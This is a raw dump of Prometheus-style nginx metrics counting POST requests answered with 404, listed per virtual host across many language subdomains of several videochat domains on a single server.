nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="it.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="it.videochat.show"} 220 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="it.videochat.tv.br"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="it.videochat.world"} 229 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jaiyuba.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jp.videochat.cafe"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jp.videochat.date"} 193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jp.videochat.mx"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jp.videochat.show"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jp.videochat.tv.br"} 329 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jp.videochat.world"} 226 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jv.videochat.cafe"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jv.videochat.date"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jv.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jv.videochat.show"} 207 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jv.videochat.tv.br"} 367 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="jv.videochat.world"} 417 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ka.videochat.cafe"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ka.videochat.date"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ka.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ka.videochat.show"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ka.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ka.videochat.world"} 596 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kbmjvka.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kctjjudm.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kjjlaro.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kk.videochat.cafe"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kk.videochat.date"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kk.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kk.videochat.show"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kk.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kk.videochat.world"} 234 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="km.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="km.videochat.date"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="km.videochat.mx"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="km.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="km.videochat.tv.br"} 183 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="km.videochat.world"} 240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kn.videochat.cafe"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kn.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kn.videochat.mx"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kn.videochat.show"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kn.videochat.tv.br"} 425 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kn.videochat.world"} 283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ko.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ko.videochat.date"} 219 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ko.videochat.mx"} 225 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ko.videochat.show"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ko.videochat.tv.br"} 188 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ko.videochat.world"} 277 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="kxylkid.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ky.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ky.videochat.date"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ky.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ky.videochat.show"} 204 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ky.videochat.tv.br"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ky.videochat.world"} 150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lb.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lb.videochat.date"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lb.videochat.mx"} 264 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lb.videochat.show"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lb.videochat.tv.br"} 275 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lb.videochat.world"} 341 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lilvami.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lo.videochat.cafe"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lo.videochat.date"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lo.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lo.videochat.show"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lo.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lo.videochat.world"} 223 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="login.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lt.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lt.videochat.date"} 303 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lt.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lt.videochat.show"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lt.videochat.tv.br"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lt.videochat.world"} 246 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lv.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lv.videochat.date"} 207 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lv.videochat.mx"} 158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lv.videochat.show"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lv.videochat.tv.br"} 262 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="lv.videochat.world"} 242 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mail.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="media.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mg.videochat.cafe"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mg.videochat.date"} 123 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mg.videochat.mx"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mg.videochat.show"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mg.videochat.tv.br"} 266 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mg.videochat.world"} 221 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mi.videochat.cafe"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mi.videochat.date"} 129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mi.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mi.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mi.videochat.tv.br"} 260 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mi.videochat.world"} 132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mk.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mk.videochat.date"} 228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mk.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mk.videochat.show"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mk.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mk.videochat.world"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ml.videochat.cafe"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ml.videochat.date"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ml.videochat.mx"} 258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ml.videochat.show"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ml.videochat.tv.br"} 513 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ml.videochat.world"} 434 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mn.videochat.cafe"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mn.videochat.date"} 107 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mn.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mn.videochat.show"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mn.videochat.tv.br"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mn.videochat.world"} 80 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mongo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mr.videochat.cafe"} 76 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mr.videochat.date"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mr.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mr.videochat.show"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mr.videochat.tv.br"} 121 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mr.videochat.world"} 420 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mrj.videochat.cafe"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mrj.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mrj.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mrj.videochat.show"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mrj.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mrj.videochat.world"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ms.videochat.cafe"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ms.videochat.date"} 97 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ms.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ms.videochat.show"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ms.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ms.videochat.world"} 209 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mt.videochat.cafe"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mt.videochat.date"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mt.videochat.mx"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mt.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mt.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="mt.videochat.world"} 93 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="my.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="my.videochat.date"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="my.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="my.videochat.show"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="my.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="my.videochat.world"} 526 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ncawath.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ne.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ne.videochat.date"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ne.videochat.mx"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ne.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ne.videochat.tv.br"} 1235 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ne.videochat.world"} 371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="news.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="nl.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="nl.videochat.date"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="nl.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="nl.videochat.show"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="nl.videochat.tv.br"} 299 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="nl.videochat.world"} 283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="no.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="no.videochat.date"} 442 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="no.videochat.mx"} 226 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="no.videochat.show"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="no.videochat.tv.br"} 132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="no.videochat.world"} 94 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="old.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="oxlioar.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pa.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pa.videochat.date"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pa.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pa.videochat.show"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pa.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pa.videochat.world"} 118 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pap.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pap.videochat.date"} 102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pap.videochat.mx"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pap.videochat.show"} 116 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pap.videochat.tv.br"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pap.videochat.world"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pdxecxblqbkn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pkiaram.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pl.videochat.cafe"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pl.videochat.date"} 222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pl.videochat.mx"} 157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pl.videochat.show"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pl.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pl.videochat.world"} 195 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="portal.th.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="portal.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="postgres.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pt.videochat.cafe"} 266 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pt.videochat.date"} 204 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pt.videochat.mx"} 150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pt.videochat.show"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="pt.videochat.world"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="qdrqgda.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="qshicka.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="rbohjhr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="remote.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ro.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ro.videochat.date"} 184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ro.videochat.mx"} 360 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ro.videochat.show"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ro.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ro.videochat.world"} 133 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ryfusmrj.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sco.videochat.cafe"} 120 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sco.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sco.videochat.mx"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sco.videochat.show"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sco.videochat.tv.br"} 614 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sco.videochat.world"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="secure.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="semjnsl.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="shop.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="si.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="si.videochat.date"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="si.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="si.videochat.show"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="si.videochat.tv.br"} 163 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="si.videochat.world"} 325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sk.videochat.cafe"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sk.videochat.date"} 166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sk.videochat.mx"} 221 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sk.videochat.show"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sk.videochat.tv.br"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sk.videochat.world"} 311 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sl.videochat.cafe"} 108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sl.videochat.date"} 318 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sl.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sl.videochat.show"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sl.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sl.videochat.world"} 219 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="slvdtur.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sptlqmk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sr.videochat.cafe"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sr.videochat.date"} 245 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sr.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sr.videochat.show"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sr.videochat.tv.br"} 175 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sr.videochat.world"} 159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="staging.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="status.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="store.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="su.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="su.videochat.date"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="su.videochat.mx"} 263 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="su.videochat.show"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="su.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="su.videochat.world"} 205 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="support.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sv.videochat.cafe"} 332 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sv.videochat.date"} 341 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sv.videochat.mx"} 155 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sv.videochat.show"} 322 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sv.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sv.videochat.world"} 849 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sw.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sw.videochat.date"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sw.videochat.mx"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sw.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sw.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="sw.videochat.world"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ta.videochat.cafe"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ta.videochat.date"} 101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ta.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ta.videochat.show"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ta.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ta.videochat.world"} 878 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="te.videochat.cafe"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="te.videochat.date"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="te.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="te.videochat.show"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="te.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="te.videochat.world"} 325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="test.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tg.videochat.cafe"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tg.videochat.date"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tg.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tg.videochat.show"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="tg.videochat.tv.br"} 3 